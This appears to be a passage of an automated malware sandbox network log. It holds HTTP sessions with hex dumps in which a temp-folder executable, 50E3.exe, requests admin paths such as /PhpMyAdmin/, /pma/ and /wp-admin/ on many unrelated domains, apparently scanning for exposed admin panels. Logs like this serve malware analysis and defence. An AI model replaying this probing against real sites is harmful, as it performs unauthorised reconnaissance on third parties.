2d 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 57 65 6c 63 6f 6d 65 20 74 6f 20 48 55 4c 2e 63 6f 2e 75 6b 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 69 6d 61 67 65 74 6f 6f 6c 62 61 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 22 20 2f 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 73 74 79 6c 65 73 2f 62 61 73 65 2e 63 73 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 68 75 6c 2e 63 6f 2e 75 6b 20 7c 20 53 65 61 72 63 68 20 66 6f 72 20 65 76 65 72 79 74 68 69 6e 67 20 68 75 6c 20 72 65 6c 61 74 65 64 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 2d 31 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 09 3c 21 2d 2d 0a 09 09 66 75 6e 63 74 69 6f 6e 20 61 64 64 5f 73 65 61 72 63 68 5f 74 72 65 6e 64 73 28 6b 65 79 77 6f 72 64 73 29 0a 09 09 7b 09 0a 09 09 09 76 61 72 20 77 69 64 74 68 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 6d 61 69 6e 5f 63 6f 6e 74 65 6e 74 27 29 2e 6f 66 66 73 65 74 57 69 64 74 68 3b 0a 09 09 09 76 61 72 20 74 72 65 6e 64 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 73 65 61 72 63 68 5f 74 72 65 6e 64 73 5f 66 72 61 6d 65 27 29 3b 0a 09 09 09 76 61 72 20 73 63 72 69 70 74 5f 73 72 63 20 3d 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 74 72 65 6e 64 73 2f 66 65 74 63 68 43 6f 6d 70 6f 6e 65 6e 74 3f 68 6c 5c 37 35 65 6e 2d 47 42 5c 34 36 71 5c 37 35 22 2b 6b 65 79 77 6f 72 64 73 2b 22 5c 34 36 67 65 6f 5c 37 35 47 42 5c 34 36 63 6d 70 74 5c 37 35 71 5c 34 36 63 6f 6e 74 65 6e 74 5c 30 37 35 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html>... ysm/ -->... hul.co.uk --><head><title>Welcome to HUL.co.uk</title><meta http-equiv="imagetoolbar" content="no" /><link rel="stylesheet" type="text/css" href="styles/base.css" /><meta name="description" lang="en" content="hul.co.uk \| Search for everything hul related" /><meta http-equiv="Pragma" content="no-cache" /><meta http-equiv="Expires" content="-1" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><script type="text/javascript">...function add_search_trends(keywords){var width = document.getElementById('main_content').offsetWidth;var trends = document.getElementById('search_trends_frame');var script_src = "http://www.google.com/trends/fetchComponent?hl\75en-GB\46q\75"+keywords+"\46geo\75GB\46cmpt\75q\46content\075
Nov 30, 2023 11:22:45.267369032 CET	1340	IN	Data Raw: 31 5c 34 36 63 69 64 5c 37 35 54 49 4d 45 53 45 52 49 45 53 5f 47 52 41 50 48 5f 30 5c 34 36 65 78 70 6f 72 74 5c 30 37 35 35 5c 34 36 77 5c 30 37 35 22 2b 77 69 64 74 68 2b 22 5c 34 36 68 5c 30 37 35 33 36 30 22 3b 0a 09 09 09 74 72 65 6e 64 73 Data Ascii: 1\46cid\75TIMESERIES_GRAPH_0\46export\0755\46w\075"+width+"\46h\075360";trends.setAttribute('src', script_src);trends.setAttribute('width',width);return false;}--></script><script type="text/javascript"></script></h
Nov 30, 2023 11:22:45.267385960 CET	1340	IN	Data Raw: 20 69 6e 20 48 55 4c 2e 63 6f 2e 75 6b 2c 20 70 6c 65 61 73 65 20 63 6c 69 63 6b 20 3c 61 20 68 72 65 66 3d 22 2f 62 75 79 2d 74 68 69 73 2d 64 6f 6d 61 69 6e 2e 70 68 70 22 3e 68 65 72 65 3c 2f 61 3e 20 74 6f 20 66 69 6e 64 20 6f 75 74 20 6d 6f Data Ascii: in HUL.co.uk, please click <a href="/buy-this-domain.php">here</a> to find out more</p></div><div style="clear: both;"></div><div style="clear: both;"></div><div class="notice-beige"><h2>Contact us</h2>
Nov 30, 2023 11:22:45.267405033 CET	677	IN	Data Raw: 61 73 73 3d 22 63 6c 65 61 72 22 3e 3c 2f 64 69 76 3e 09 09 0a 09 3c 2f 66 69 65 6c 64 73 65 74 3e 0a 3c 2f 66 6f 72 6d 3e 0a 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 62 72 2f 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 20 3c 21 2d Data Ascii: ass="clear"></div></fieldset></form></div><br/></div> ... notice-beige --></div> ... content --></div> ... bd --><div class="clear"></div><div class="ft"><div id="giraffe_info"> <br /><br />

Session ID	Source IP	Source Port	Destination IP	Destination Port
187	192.168.2.4	49433	213.171.212.244	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:43.672560930 CET	221	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:43.853605032 CET	442	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.18.0 (Ubuntu) Date: Thu, 30 Nov 2023 10:22:43 GMT Content-Type: text/html Content-Length: 178 Connection: keep-alive Location: https://gco.uk/PhpMyAdmin/ Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
188	192.168.2.4	49510	104.238.144.219	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:43.687272072 CET	222	OUT	GET /admin.php HTTP/1.1 Host: nrnet.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:43.817949057 CET	538	IN	HTTP/1.1 301 Moved Permanently Date: Thu, 30 Nov 2023 10:22:43 GMT Server: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_wsgi/4.6.4 Python/3.6 Location: https://nrnet.com/admin.php Content-Length: 235 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6e 72 6e 65 74 2e 63 6f 6d 2f 61 64 6d 69 6e 2e 70 68 70 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://nrnet.com/admin.php">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
189	192.168.2.4	49621	192.99.158.243	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:43.760854006 CET	218	OUT	GET /pma/ HTTP/1.1 Host: onlist.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:43.875579119 CET	569	IN	HTTP/1.1 302 Found Cache-Control: private Content-Type: text/html; charset=utf-8 Location: http://ww42.onlist.com Server: Microsoft-IIS/10.0 X-AspNetMvc-Version: 5.2 X-AspNet-Version: 4.0.30319 Set-Cookie: _dhc.139992723=a27cdfa1-87a2-425a-81f2-2833c247ad2e; path=/ X-Powered-By: ASP.NET Date: Thu, 30 Nov 2023 10:20:16 GMT Connection: close Content-Length: 139 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 34 32 2e 6f 6e 6c 69 73 74 2e 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 68 32 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="http://ww42.onlist.com">here</a>.</h2></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
190	192.168.2.4	49631	216.37.42.12	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:43.785298109 CET	218	OUT	GET /pma/ HTTP/1.1 Host: noweco.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:43.917313099 CET	481	IN	HTTP/1.1 301 Moved Permanently Date: Thu, 30 Nov 2023 10:22:43 GMT Server: Apache Location: https://www.noweco.com/pma/ Content-Length: 235 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6e 6f 77 65 63 6f 2e 63 6f 6d 2f 70 6d 61 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.noweco.com/pma/">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
191	192.168.2.4	65441	145.14.30.248	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:43.831370115 CET	215	OUT	GET /admin HTTP/1.1 Host: san.ee Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:44.042237043 CET	828	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 30 Nov 2023 10:22:43 GMT Content-Type: text/html Content-Length: 494 Last-Modified: Tue, 28 Nov 2023 01:18:59 GMT Connection: keep-alive Keep-Alive: timeout=20 ETag: "65654003-1ee" Cache-Control: no-cache Accept-Ranges: bytes Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 68 74 74 70 22 20 6e 61 6d 65 3d 22 68 74 74 70 22 20 76 61 6c 75 65 3d 22 35 30 30 30 22 3e 0a 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 68 74 74 70 73 22 20 6e 61 6d 65 3d 22 68 74 74 70 73 22 20 76 61 6c 75 65 3d 22 35 30 30 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 70 72 65 66 65 72 5f 68 74 74 70 73 22 20 6e 61 6d 65 3d 22 70 72 65 66 65 72 5f 68 74 74 70 73 22 20 76 61 6c 75 65 3d 22 74 72 75 65 22 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 76 61 72 20 70 72 6f 74 6f 63 6f 6c 3d 22 68 74 74 70 73 3a 22 3b 0a 20 20 20 20 20 20 20 20 76 61 72 20 70 6f 72 74 3d 35 30 30 31 3b 0a 20 20 20 20 20 20 20 20 76 61 72 20 55 52 4c 3d 70 72 6f 74 6f 63 6f 6c 2b 22 2f 2f 22 2b 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 2b 22 3a 22 2b 70 6f 72 74 2b 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 2b 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 3b 0a 20 20 20 20 20 20 20 20 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 55 52 4c 29 3b 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html> <body> <input type="hidden" id="http" name="http" value="5000"> <input type="hidden" id="https" name="https" value="5001"> <input type="hidden" id="prefer_https" name="prefer_https" value="true"> </body> <script type="text/javascript"> var protocol="https:"; var port=5001; var URL=protocol+"//"+location.hostname+":"+port+location.pathname+location.search; location.replace(URL); </script></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
192	192.168.2.4	49718	192.99.158.243	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:43.860522985 CET	316	OUT	GET /wp-admin/ HTTP/1.1 Host: gr.2mail.com Accept: / Accept-Encoding: deflate, gzip Cookie: _dhc.651070=853129b2-abbc-49d2-936e-93e4e6ec17aa User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: http://ww42.2mail.com/
Nov 30, 2023 11:22:43.974122047 CET	494	IN	HTTP/1.1 302 Found Cache-Control: private Content-Type: text/html; charset=utf-8 Location: http://ww42.2mail.com Server: Microsoft-IIS/10.0 X-AspNetMvc-Version: 5.2 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Date: Thu, 30 Nov 2023 10:20:16 GMT Connection: close Content-Length: 138 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 34 32 2e 32 6d 61 69 6c 2e 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 68 32 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="http://ww42.2mail.com">here</a>.</h2></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
193	192.168.2.4	49645	213.171.212.244	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:43.862246990 CET	221	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:44.041759014 CET	442	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.18.0 (Ubuntu) Date: Thu, 30 Nov 2023 10:22:43 GMT Content-Type: text/html Content-Length: 178 Connection: keep-alive Location: https://gco.uk/PhpMyAdmin/ Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
194	192.168.2.4	49719	192.99.158.243	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:43.862333059 CET	318	OUT	GET /wp-admin/ HTTP/1.1 Host: onlist.com Accept: / Accept-Encoding: deflate, gzip Cookie: _dhc.139992723=30fde576-b761-4503-9a2e-eb69ea07d855 User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: http://ww42.onlist.com/
Nov 30, 2023 11:22:43.976099968 CET	496	IN	HTTP/1.1 302 Found Cache-Control: private Content-Type: text/html; charset=utf-8 Location: http://ww42.onlist.com Server: Microsoft-IIS/10.0 X-AspNetMvc-Version: 5.2 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Date: Thu, 30 Nov 2023 10:20:16 GMT Connection: close Content-Length: 139 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 34 32 2e 6f 6e 6c 69 73 74 2e 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 68 32 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="http://ww42.onlist.com">here</a>.</h2></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
195	192.168.2.4	49720	213.171.212.244	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:43.936001062 CET	221	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:44.116437912 CET	442	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.18.0 (Ubuntu) Date: Thu, 30 Nov 2023 10:22:44 GMT Content-Type: text/html Content-Length: 178 Connection: keep-alive Location: https://gco.uk/PhpMyAdmin/ Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
196	192.168.2.4	49869	194.63.248.47	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:43.988521099 CET	222	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: z-a.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:44.190409899 CET	534	IN	HTTP/1.1 302 Found Date: Thu, 30 Nov 2023 10:22:44 GMT Server: Apache/2.4.25 (Debian) Location: https://z-a.com/PhpMyAdmin/ Content-Length: 284 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 7a 2d 61 2e 63 6f 6d 2f 50 68 70 4d 79 41 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 35 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 7a 2d 61 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://z-a.com/PhpMyAdmin/">here</a>.</p><hr><address>Apache/2.4.25 (Debian) Server at z-a.com Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
197	192.168.2.4	49512	64.190.63.111	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:43.991280079 CET	218	OUT	GET /admin/ HTTP/1.1 Host: apee.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:44.181606054 CET	142	IN	HTTP/1.1 439 date: Thu, 30 Nov 2023 10:22:44 GMT content-length: 0 server: NginX

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
198	192.168.2.4	50026	104.247.82.52	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:44.195277929 CET	214	OUT	GET /admin HTTP/1.1 Host: cm.cz Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:44.345993996 CET	1340	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 30 Nov 2023 10:22:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_qiRPZIAtzHydvUMsAVIGvSPb6sAI+wzN7l9S/uTmIHkupXeDqZUu4CsMnmm4bNbD/AIwPeLw5n+IFZQnwfrE6Q== Accept-CH: viewport-width Accept-CH: dpr Accept-CH: device-memory Accept-CH: rtt Accept-CH: downlink Accept-CH: ect Accept-CH: ua Accept-CH: ua-full-version Accept-CH: ua-platform Accept-CH: ua-platform-version Accept-CH: ua-arch Accept-CH: ua-model Accept-CH: ua-mobile Accept-CH-Lifetime: 30 X-Domain: cm.cz X-Subdomain: Content-Encoding: gzip Data Raw: 37 65 35 0d 0a 1f 8b 08 00 00 00 00 00 04 03 e5 5b eb 7a da 48 93 fe 1d 5f 85 42 9e 35 78 87 93 00 9f 83 b3 d8 d8 b1 3d 01 9f b0 63 9c 27 9b 47 48 0d 08 84 c4 48 c2 1c f2 e5 02 f6 ba f6 c6 f6 ad ee d6 09 70 32 99 6f 32 7f 96 04 83 ba ab bb aa eb d4 d5 55 cd db d7 f5 ab 93 56 fb fa 54 e9 fb 23 eb 68 e3 2d 7d 28 86 e6 6b 39 cd e8 58 8e 3e 1c b2 79 35 d5 38 9b 4e eb 37 ed cb df 9d a7 8b fe b3 de ac dd 9c 1e 1f df d4 ea 77 d3 da f4 ae 76 79 5c fb f0 c7 a4 7e 76 da 7a bc b5 8b e7 6e 71 bb 7b 7f bd 7b 7a d9 da dd 9d b5 ed eb d1 6d 67 dc 98 57 9e 87 7b bf b7 cd 73 7b d8 1c 33 c3 1e 5c d5 9a 97 ba f6 58 7f d4 7f bf b9 6c 16 ed c7 df 9f 2e 3f ec b6 74 f3 b2 be 57 73 ce 1f 7f 57 b7 f7 4e 6a d3 d3 5a ed a6 5a fd f2 87 79 7b fd 74 51 f3 17 e7 73 e3 f9 be e1 d5 1e 2e de 3f df 5d 77 76 bc da c5 6f d3 45 73 d7 da bf 2b 4c 5a a3 8b f3 e1 64 fc c8 ea 7f 3c dd 